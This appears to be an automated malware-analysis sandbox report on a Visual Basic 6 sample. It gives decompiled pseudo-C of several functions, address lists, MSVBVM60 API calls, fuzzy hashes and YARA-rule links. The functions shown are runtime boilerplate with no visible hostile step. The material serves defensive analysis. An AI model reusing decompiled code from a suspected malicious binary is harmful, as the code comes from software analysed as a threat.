0x0041b3f0
0x0041b3f3
0x0041b3f8
0x0041b3f8
0x0041b404
0x0041b409
0x0041b40a
0x0041b42f
0x0041b434

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0041B2E6
__vbaVarDup.MSVBVM60(?,?,?,?,00401426), ref: 0041B310
__vbaNew2.MSVBVM60(00407448,0041E010,?,?,?,?,00401426), ref: 0041B32E
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041B35B
__vbaChkstk.MSVBVM60(?,00000000), ref: 0041B390
__vbaChkstk.MSVBVM60(?,00000000), ref: 0041B3A1
__vbaChkstk.MSVBVM60(?,00000000), ref: 0041B3B2
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A120,000001B4,?,?,00000000), ref: 0041B3F3
__vbaFreeObj.MSVBVM60(?,?,00000000), ref: 0041B404
__vbaFreeVar.MSVBVM60(0041B435,?,?,00000000), ref: 0041B42F

Memory Dump Source

Source File: 00000000.00000002.673234009.0000000000416000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.673098487.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.673119523.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.673298451.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673312782.000000000043A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673327154.000000000043B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Chkstk$Free$CheckHresultNew2
String ID:
API String ID: 2431949001-0
Opcode ID: 432b3ac9b6d05011c9a28fbddeb31b40b3a782b2f74754fc1193c853339ef37a
Instruction ID: de8cf039b38bf294703388c7511a26afe6f25e37cb668118b4457ab354f3c4b3
Opcode Fuzzy Hash: 432b3ac9b6d05011c9a28fbddeb31b40b3a782b2f74754fc1193c853339ef37a
Instruction Fuzzy Hash: 1941E570900708EBCB11DFA5C845BDDBBB5FF09708F20452AF901AF2A2C7BA5885DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041B119, Relevance: 15.1, APIs: 10, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E0041B119(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v32;
				intOrPtr _v40;
				char _v48;
				intOrPtr _v56;
				char _v64;
				intOrPtr _v72;
				char _v80;
				intOrPtr _v88;
				char _v96;
				intOrPtr _v104;
				intOrPtr _v112;
				intOrPtr _v120;
				char _v128;
				void* _v164;
				signed int _v168;
				signed int _v176;
				short _t51;
				char* _t54;
				char* _t55;
				signed int _t62;
				intOrPtr _t75;

				_push(0x401426);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t75;
				L00401420();
				_v12 = _t75;
				_v8 = 0x401248;
				_v104 = 0x40a2a8;
				_v112 = 8;
				L00401576();
				_push( &_v48);
				_push( &_v64);
				L00401504();
				_v120 = 0x40a2b0;
				_v128 = 0x8008;
				_push( &_v64);
				_t51 =  &_v128;
				_push(_t51);
				L0040155E();
				_v164 = _t51;
				_push( &_v64);
				_push( &_v48);
				_push(2);
				L0040159A();
				_t54 = _v164;
				if(_t54 != 0) {
					L004014FE();
					_t55 =  &_v32;
					L004015B8();
					_v164 = _t55;
					_v88 = 0x80020004;
					_v96 = 0xa;
					_v72 = 0x80020004;
					_v80 = 0xa;
					_v56 = 0x80020004;
					_v64 = 0xa;
					_v40 = 0x80020004;
					_v48 = 0xa;
					_t62 =  *((intOrPtr*)( *_v164 + 0x44))(_v164, 0x102b,  &_v48,  &_v64,  &_v80,  &_v96, _t55, _t54);
					asm("fclex");
					_v168 = _t62;
					if(_v168 >= 0) {
						_v176 = _v176 & 0x00000000;
					} else {
						_push(0x44);
						_push(0x40a300);
						_push(_v164);
						_push(_v168);
						L004015AC();
						_v176 = _t62;
					}
					L004015A6();
					_push( &_v96);
					_push( &_v80);
					_push( &_v64);
					_t54 =  &_v48;
					_push(_t54);
					_push(4);
					L0040159A();
				}
				_push(0x41b2a9);
				return _t54;
			}

0x0041b11e
0x0041b129
0x0041b12a
0x0041b136
0x0041b13e
0x0041b141
0x0041b148
0x0041b14f
0x0041b15c
0x0041b164
0x0041b168
0x0041b169
0x0041b16e
0x0041b175
0x0041b17f
0x0041b180
0x0041b183
0x0041b184
0x0041b189
0x0041b193
0x0041b197
0x0041b198
0x0041b19a
0x0041b1a2
0x0041b1ab
0x0041b1b1
0x0041b1b7
0x0041b1bb
0x0041b1c0
0x0041b1c6
0x0041b1cd
0x0041b1d4
0x0041b1db
0x0041b1e2
0x0041b1e9
0x0041b1f0
0x0041b1f7
0x0041b221
0x0041b224
0x0041b226
0x0041b233
0x0041b255
0x0041b235
0x0041b235
0x0041b237
0x0041b23c
0x0041b242
0x0041b248
0x0041b24d
0x0041b24d
0x0041b25f
0x0041b267
0x0041b26b
0x0041b26f
0x0041b270
0x0041b273
0x0041b274
0x0041b276
0x0041b27b
0x0041b27e
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0041B136
__vbaVarDup.MSVBVM60 ref: 0041B15C
#518.MSVBVM60(?,?), ref: 0041B169
__vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?), ref: 0041B184
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008008,?,?,?,?,?), ref: 0041B19A
#685.MSVBVM60 ref: 0041B1B1
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041B1BB
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A300,00000044), ref: 0041B248
__vbaFreeObj.MSVBVM60(00000000,?,0040A300,00000044), ref: 0041B25F
__vbaFreeVarList.MSVBVM60(00000004,0000000A,0000000A,0000000A,0000000A), ref: 0041B276

Memory Dump Source

Source File: 00000000.00000002.673234009.0000000000416000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.673098487.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.673119523.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.673298451.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673312782.000000000043A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673327154.000000000043B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$List$#518#685CheckChkstkHresult
String ID:
API String ID: 2073426006-0
Opcode ID: c7ac0434616f1f0113f11a73c17570798322dda7f526a538360e9d299b47443f
Instruction ID: 756a812c4c8190808d3fb5a0d737ac7adab776321205258b769afe80004c7695
Opcode Fuzzy Hash: c7ac0434616f1f0113f11a73c17570798322dda7f526a538360e9d299b47443f
Instruction Fuzzy Hash: 1841E8B1D0020CAEDB11DFD1C845BDEB7BCEF09304F50816AE215BA191D7789A49CF66

Uniqueness

Uniqueness Score: -1.00%

Function 0041A535, Relevance: 15.1, APIs: 10, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0041A535(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8, void* _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v52;
				char _v56;
				intOrPtr _v64;
				intOrPtr _v72;
				intOrPtr* _v76;
				signed int _v80;
				intOrPtr* _v92;
				signed int _v96;
				char* _t42;
				signed int _t46;
				void* _t62;
				void* _t64;
				intOrPtr _t65;

				_t65 = _t64 - 0xc;
				 *[fs:0x0] = _t65;
				L00401420();
				_v16 = _t65;
				_v12 = 0x4011a8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x48,  *[fs:0x0], 0x401426, _t62);
				L00401582();
				L00401576();
				if( *0x41e010 != 0) {
					_v92 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v92 = 0x41e010;
				}
				_t42 =  &_v56;
				L004015B8();
				_v76 = _t42;
				_v64 = 0x80020004;
				_v72 = 0xa;
				L00401420();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t46 =  *((intOrPtr*)( *_v76 + 0x1cc))(_v76, 0x10, _t42,  *((intOrPtr*)( *((intOrPtr*)( *_v92)) + 0x318))( *_v92));
				asm("fclex");
				_v80 = _t46;
				if(_v80 >= 0) {
					_v96 = _v96 & 0x00000000;
				} else {
					_push(0x1cc);
					_push(0x40a214);
					_push(_v76);
					_push(_v80);
					L004015AC();
					_v96 = _t46;
				}
				L004015A6();
				asm("wait");
				_push(0x41a653);
				L00401588();
				L00401594();
				return _t46;
			}

0x0041a538
0x0041a547
0x0041a551
0x0041a559
0x0041a55c
0x0041a563
0x0041a572
0x0041a57b
0x0041a586
0x0041a592
0x0041a5ac
0x0041a594
0x0041a594
0x0041a599
0x0041a59e
0x0041a5a3
0x0041a5a3
0x0041a5c7
0x0041a5cb
0x0041a5d0
0x0041a5d3
0x0041a5da
0x0041a5e4
0x0041a5ee
0x0041a5ef
0x0041a5f0
0x0041a5f1
0x0041a5fa
0x0041a600
0x0041a602
0x0041a609
0x0041a625
0x0041a60b
0x0041a60b
0x0041a610
0x0041a615
0x0041a618
0x0041a61b
0x0041a620
0x0041a620
0x0041a62c
0x0041a631
0x0041a632
0x0041a645
0x0041a64d
0x0041a652

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0041A551
__vbaStrCopy.MSVBVM60(?,?,?,?,00401426), ref: 0041A57B
__vbaVarDup.MSVBVM60(?,?,?,?,00401426), ref: 0041A586
__vbaNew2.MSVBVM60(00407448,0041E010,?,?,?,?,00401426), ref: 0041A59E
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041A5CB
__vbaChkstk.MSVBVM60(?,00000000), ref: 0041A5E4
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A214,000001CC), ref: 0041A61B
__vbaFreeObj.MSVBVM60 ref: 0041A62C
__vbaFreeStr.MSVBVM60(0041A653), ref: 0041A645
__vbaFreeVar.MSVBVM60(0041A653), ref: 0041A64D

Memory Dump Source

Source File: 00000000.00000002.673234009.0000000000416000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.673098487.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.673119523.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.673298451.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673312782.000000000043A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673327154.000000000043B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Chkstk$CheckCopyHresultNew2
String ID:
API String ID: 763330518-0
Opcode ID: a6eda43a375c80ac136af143bb103fb9c0d300882e4bf390ca5178c5d7e23aee
Instruction ID: 8e56d1615674fa8ef0618d2b240789498010ba82d25e3841a19caab61933a226
Opcode Fuzzy Hash: a6eda43a375c80ac136af143bb103fb9c0d300882e4bf390ca5178c5d7e23aee
Instruction Fuzzy Hash: 1D31FA74D41208EFCB10EF91C845BDDBBB5AF49708F50442AF406BB2A1C7B99986CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041AEB5, Relevance: 13.6, APIs: 9, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0041AEB5(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a20, void* _a40) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v32;
				void* _v48;
				char _v52;
				intOrPtr* _v56;
				signed int _v60;
				intOrPtr* _v72;
				signed int _v76;
				char* _t39;
				signed int _t42;
				void* _t56;
				void* _t58;
				intOrPtr _t59;

				_t59 = _t58 - 0xc;
				 *[fs:0x0] = _t59;
				L00401420();
				_v16 = _t59;
				_v12 = 0x401228;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x34,  *[fs:0x0], 0x401426, _t56);
				L00401576();
				L00401582();
				if( *0x41e010 != 0) {
					_v72 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v72 = 0x41e010;
				}
				_t39 =  &_v52;
				L004015B8();
				_v56 = _t39;
				_t42 =  *((intOrPtr*)( *_v56 + 0x1bc))(_v56, _t39,  *((intOrPtr*)( *((intOrPtr*)( *_v72)) + 0x314))( *_v72));
				asm("fclex");
				_v60 = _t42;
				if(_v60 >= 0) {
					_v76 = _v76 & 0x00000000;
				} else {
					_push(0x1bc);
					_push(0x40a120);
					_push(_v56);
					_push(_v60);
					L004015AC();
					_v76 = _t42;
				}
				L004015A6();
				_push(0x41afb3);
				L00401588();
				L00401594();
				return _t42;
			}

0x0041aeb8
0x0041aec7
0x0041aed1
0x0041aed9
0x0041aedc
0x0041aee3
0x0041aef2
0x0041aefb
0x0041af06
0x0041af12
0x0041af2c
0x0041af14
0x0041af14
0x0041af19
0x0041af1e
0x0041af23
0x0041af23
0x0041af47
0x0041af4b
0x0041af50
0x0041af5b
0x0041af61
0x0041af63
0x0041af6a
0x0041af86
0x0041af6c
0x0041af6c
0x0041af71
0x0041af76
0x0041af79
0x0041af7c
0x0041af81
0x0041af81
0x0041af8d
0x0041af92
0x0041afa5
0x0041afad
0x0041afb2

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0041AED1
__vbaVarDup.MSVBVM60(?,?,?,?,00401426), ref: 0041AEFB
__vbaStrCopy.MSVBVM60(?,?,?,?,00401426), ref: 0041AF06
__vbaNew2.MSVBVM60(00407448,0041E010,?,?,?,?,00401426), ref: 0041AF1E
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041AF4B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A120,000001BC), ref: 0041AF7C
__vbaFreeObj.MSVBVM60 ref: 0041AF8D
__vbaFreeStr.MSVBVM60(0041AFB3), ref: 0041AFA5
__vbaFreeVar.MSVBVM60(0041AFB3), ref: 0041AFAD

Memory Dump Source

Source File: 00000000.00000002.673234009.0000000000416000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.673098487.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.673119523.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.673298451.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673312782.000000000043A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673327154.000000000043B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckChkstkCopyHresultNew2
String ID:
API String ID: 2810356740-0
Opcode ID: ea2415c5e13f09ab5db89999afbb0891662a58685aa53d1f25ca1f53b6cce715
Instruction ID: d957fa9bd74fd5d39fc7d5920b28560656fd5b0eeb95e287ef0bf95606af1e13
Opcode Fuzzy Hash: ea2415c5e13f09ab5db89999afbb0891662a58685aa53d1f25ca1f53b6cce715
Instruction Fuzzy Hash: 70312C74901208EFCB00EF95D985FDDBBB4EF48308F20452AF402BB2A1C778A946CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041AA83, Relevance: 10.5, APIs: 7, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0041AA83(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a40) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v36;
				void* _v40;
				signed int _v44;
				signed int _t10;
				signed int _t13;
				intOrPtr _t26;

				_push(0x401426);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t26;
				_t10 = 0x1c;
				L00401420();
				_v12 = _t26;
				_v8 = 0x4011d8;
				L00401576();
				_push(0x40a2a8);
				L00401540();
				L0040156A();
				_push(_t10);
				_push(0x40a2b0);
				L0040154C();
				asm("sbb eax, eax");
				_t13 =  ~( ~( ~_t10));
				_v44 = _t13;
				L00401588();
				_push(0x41ab07);
				L00401594();
				return _t13;
			}

0x0041aa88
0x0041aa93
0x0041aa94
0x0041aa9d
0x0041aa9e
0x0041aaa6
0x0041aaa9
0x0041aab6
0x0041aabb
0x0041aac0
0x0041aaca
0x0041aacf
0x0041aad0
0x0041aad5
0x0041aadc
0x0041aae0
0x0041aae2
0x0041aae9
0x0041aaee
0x0041ab01
0x0041ab06

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0041AA9E
__vbaVarDup.MSVBVM60(?,?,?,?,00401426), ref: 0041AAB6
#517.MSVBVM60(0040A2A8,?,?,?,?,00401426), ref: 0041AAC0
__vbaStrMove.MSVBVM60(0040A2A8,?,?,?,?,00401426), ref: 0041AACA
__vbaStrCmp.MSVBVM60(0040A2B0,00000000,0040A2A8,?,?,?,?,00401426), ref: 0041AAD5
__vbaFreeStr.MSVBVM60(0040A2B0,00000000,0040A2A8,?,?,?,?,00401426), ref: 0041AAE9
__vbaFreeVar.MSVBVM60(0041AB07,0040A2B0,00000000,0040A2A8,?,?,?,?,00401426), ref: 0041AB01

Memory Dump Source

Source File: 00000000.00000002.673234009.0000000000416000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.673098487.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.673119523.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.673298451.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673312782.000000000043A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673327154.000000000043B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#517ChkstkMove
String ID:
API String ID: 1356509945-0
Opcode ID: 9015d88a423a08a91510c531ae853b2355b73aa82da048eb352c94a2dd62191a
Instruction ID: 871250746f8d99880017494cec3c86372ea08fe62ec9697c5d6364c9de23e4fe
Opcode Fuzzy Hash: 9015d88a423a08a91510c531ae853b2355b73aa82da048eb352c94a2dd62191a
Instruction Fuzzy Hash: FEF08671550208BACB04EB65CD43EEE7778EB58B44F50413FF002B71E0DA7C19408669

Uniqueness

Uniqueness Score: -1.00%

Function 0041D16E, Relevance: 9.0, APIs: 6, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0041D16E(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr __fp0, void* _a32, void* _a40) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v36;
				intOrPtr _v40;
				void* _v44;
				void* _t11;
				intOrPtr _t24;

				_push(0x401426);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t24;
				_t11 = 0x1c;
				L00401420();
				_v12 = _t24;
				_v8 = 0x401400;
				L00401582();
				L00401576();
				L004014B0();
				_v40 = __fp0;
				asm("wait");
				_push(0x41d1d0);
				L00401594();
				L00401588();
				return _t11;
			}

0x0041d173
0x0041d17e
0x0041d17f
0x0041d188
0x0041d189
0x0041d191
0x0041d194
0x0041d1a1
0x0041d1ac
0x0041d1b1
0x0041d1b6
0x0041d1b9
0x0041d1ba
0x0041d1c2
0x0041d1ca
0x0041d1cf

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0041D189
__vbaStrCopy.MSVBVM60(?,?,?,?,00401426), ref: 0041D1A1
__vbaVarDup.MSVBVM60(?,?,?,?,00401426), ref: 0041D1AC
#535.MSVBVM60(?,?,?,?,00401426), ref: 0041D1B1
__vbaFreeVar.MSVBVM60(0041D1D0,?,?,?,?,00401426), ref: 0041D1C2
__vbaFreeStr.MSVBVM60(0041D1D0,?,?,?,?,00401426), ref: 0041D1CA

Memory Dump Source

Source File: 00000000.00000002.673234009.0000000000416000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.673098487.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.673119523.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.673298451.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673312782.000000000043A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673327154.000000000043B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#535ChkstkCopy
String ID:
API String ID: 1175001437-0
Opcode ID: 718246cb539f48b79739ac998e913b7000d4dbb31f7c7e9f4829ba9ed5227b7b
Instruction ID: 552b55c7b497499b60c1fe8ec02bd74c3c53b2302922e6c0671b208353abbb98
Opcode Fuzzy Hash: 718246cb539f48b79739ac998e913b7000d4dbb31f7c7e9f4829ba9ed5227b7b
Instruction Fuzzy Hash: DBF01D71940508BACB04EB56CD42EDEBB78EB48758F50452AF402771B1DB786945CA68

Uniqueness

Uniqueness Score: -1.00%

Function 0041B45E, Relevance: 7.6, APIs: 5, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E0041B45E(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v24;
				void* _v28;
				void* _v32;
				intOrPtr* _v36;
				signed int _v40;
				intOrPtr* _v44;
				signed int _v48;
				intOrPtr* _v56;
				signed int _v60;
				signed int _v64;
				signed int _t41;
				signed int _t46;
				short _t47;
				intOrPtr _t55;

				_push(0x401426);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t55;
				_push(0x2c);
				L00401420();
				_v12 = _t55;
				_v8 = 0x401270;
				if( *0x41fb98 != 0) {
					_v56 = 0x41fb98;
				} else {
					_push(0x41fb98);
					_push(0x40a268);
					L004015B2();
					_v56 = 0x41fb98;
				}
				_v36 =  *_v56;
				_t41 =  *((intOrPtr*)( *_v36 + 0x14))(_v36,  &_v28);
				asm("fclex");
				_v40 = _t41;
				if(_v40 >= 0) {
					_v60 = _v60 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x40a258);
					_push(_v36);
					_push(_v40);
					L004015AC();
					_v60 = _t41;
				}
				_v44 = _v28;
				_t46 =  *((intOrPtr*)( *_v44 + 0x108))(_v44,  &_v32);
				asm("fclex");
				_v48 = _t46;
				if(_v48 >= 0) {
					_v64 = _v64 & 0x00000000;
				} else {
					_push(0x108);
					_push(0x40a310);
					_push(_v44);
					_push(_v48);
					L004015AC();
					_v64 = _t46;
				}
				_t47 = _v32;
				_v24 = _t47;
				L004015A6();
				_push(0x41b552);
				return _t47;
			}

0x0041b463
0x0041b46e
0x0041b46f
0x0041b476
0x0041b479
0x0041b481
0x0041b484
0x0041b492
0x0041b4ac
0x0041b494
0x0041b494
0x0041b499
0x0041b49e
0x0041b4a3
0x0041b4a3
0x0041b4b8
0x0041b4c7
0x0041b4ca
0x0041b4cc
0x0041b4d3
0x0041b4ec
0x0041b4d5
0x0041b4d5
0x0041b4d7
0x0041b4dc
0x0041b4df
0x0041b4e2
0x0041b4e7
0x0041b4e7
0x0041b4f3
0x0041b502
0x0041b508
0x0041b50a
0x0041b511
0x0041b52d
0x0041b513
0x0041b513
0x0041b518
0x0041b51d
0x0041b520
0x0041b523
0x0041b528
0x0041b528
0x0041b531
0x0041b535
0x0041b53c
0x0041b541
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0041B479
__vbaNew2.MSVBVM60(0040A268,0041FB98,?,?,?,?,00401426), ref: 0041B49E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A258,00000014,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0041B4E2
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A310,00000108,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0041B523
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0041B53C

Memory Dump Source

Source File: 00000000.00000002.673234009.0000000000416000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.673098487.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.673119523.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.673298451.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673312782.000000000043A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673327154.000000000043B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$ChkstkFreeNew2
String ID:
API String ID: 1616694062-0
Opcode ID: befd24ae8e1336e3d0bf72ce7faa4efd7cf4a6a18ece1915943ee400b005e34a
Instruction ID: c4f2f1f98d40a1d1a84d9fcebb9d3689465da9bfe2364b3f28600ae83610b934
Opcode Fuzzy Hash: befd24ae8e1336e3d0bf72ce7faa4efd7cf4a6a18ece1915943ee400b005e34a
Instruction Fuzzy Hash: 8A31F5B1D41208EFCB00DFA5C945BDEBBB5FB08714F60806AF101B62A1C77959859FA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041BCBF, Relevance: 7.6, APIs: 5, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E0041BCBF(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				intOrPtr* _v32;
				signed int _v36;
				intOrPtr* _v48;
				signed int _v52;
				char* _t33;
				signed int _t36;
				void* _t44;
				void* _t46;
				intOrPtr _t47;

				_t47 = _t46 - 0xc;
				 *[fs:0x0] = _t47;
				L00401420();
				_v16 = _t47;
				_v12 = 0x4012c0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x1c,  *[fs:0x0], 0x401426, _t44);
				if( *0x41e010 != 0) {
					_v48 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v48 = 0x41e010;
				}
				_t33 =  &_v28;
				L004015B8();
				_v32 = _t33;
				_t36 =  *((intOrPtr*)( *_v32 + 0x1c4))(_v32, _t33,  *((intOrPtr*)( *((intOrPtr*)( *_v48)) + 0x304))( *_v48));
				asm("fclex");
				_v36 = _t36;
				if(_v36 >= 0) {
					_v52 = _v52 & 0x00000000;
				} else {
					_push(0x1c4);
					_push(0x40a0f4);
					_push(_v32);
					_push(_v36);
					L004015AC();
					_v52 = _t36;
				}
				L004015A6();
				_push(0x41bd97);
				return _t36;
			}

0x0041bcc2
0x0041bcd1
0x0041bcdb
0x0041bce3
0x0041bce6
0x0041bced
0x0041bcfc
0x0041bd06
0x0041bd20
0x0041bd08
0x0041bd08
0x0041bd0d
0x0041bd12
0x0041bd17
0x0041bd17
0x0041bd3b
0x0041bd3f
0x0041bd44
0x0041bd4f
0x0041bd55
0x0041bd57
0x0041bd5e
0x0041bd7a
0x0041bd60
0x0041bd60
0x0041bd65
0x0041bd6a
0x0041bd6d
0x0041bd70
0x0041bd75
0x0041bd75
0x0041bd81
0x0041bd86
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0041BCDB
__vbaNew2.MSVBVM60(00407448,0041E010,?,?,?,?,00401426), ref: 0041BD12
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041BD3F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A0F4,000001C4), ref: 0041BD70
__vbaFreeObj.MSVBVM60 ref: 0041BD81

Memory Dump Source

Source File: 00000000.00000002.673234009.0000000000416000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.673098487.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.673119523.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.673298451.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673312782.000000000043A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673327154.000000000043B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckChkstkFreeHresultNew2
String ID:
API String ID: 4127847336-0
Opcode ID: 442cf5dd84aeb6c89a40f8e3482c3aab434f32018973342e58fa29d10a2123a1
Instruction ID: 07776bde60b593e84ce3fde934883dd21e881af33a20d55b1abed777e48a7dc4
Opcode Fuzzy Hash: 442cf5dd84aeb6c89a40f8e3482c3aab434f32018973342e58fa29d10a2123a1
Instruction Fuzzy Hash: 2921C474940208EFCB10DFA5D845FDEBBB4FB48708F10846AE501BB2A0C77995819BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041C616, Relevance: 7.6, APIs: 5, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0041C616(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v32;
				intOrPtr* _v36;
				signed int _v40;
				intOrPtr* _v48;
				signed int _v52;
				char* _t26;
				signed int _t29;
				intOrPtr _t40;

				_push(0x401426);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t40;
				_push(0x20);
				L00401420();
				_v12 = _t40;
				_v8 = 0x401350;
				if( *0x41e010 != 0) {
					_v48 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v48 = 0x41e010;
				}
				_t26 =  &_v32;
				L004015B8();
				_v36 = _t26;
				_t29 =  *((intOrPtr*)( *_v36 + 0x1bc))(_v36, _t26,  *((intOrPtr*)( *((intOrPtr*)( *_v48)) + 0x308))( *_v48));
				asm("fclex");
				_v40 = _t29;
				if(_v40 >= 0) {
					_v52 = _v52 & 0x00000000;
				} else {
					_push(0x1bc);
					_push(0x40a120);
					_push(_v36);
					_push(_v40);
					L004015AC();
					_v52 = _t29;
				}
				L004015A6();
				_push(0x41c6db);
				return _t29;
			}

0x0041c61b
0x0041c626
0x0041c627
0x0041c62e
0x0041c631
0x0041c639
0x0041c63c
0x0041c64a
0x0041c664
0x0041c64c
0x0041c64c
0x0041c651
0x0041c656
0x0041c65b
0x0041c65b
0x0041c67f
0x0041c683
0x0041c688
0x0041c693
0x0041c699
0x0041c69b
0x0041c6a2
0x0041c6be
0x0041c6a4
0x0041c6a4
0x0041c6a9
0x0041c6ae
0x0041c6b1
0x0041c6b4
0x0041c6b9
0x0041c6b9
0x0041c6c5
0x0041c6ca
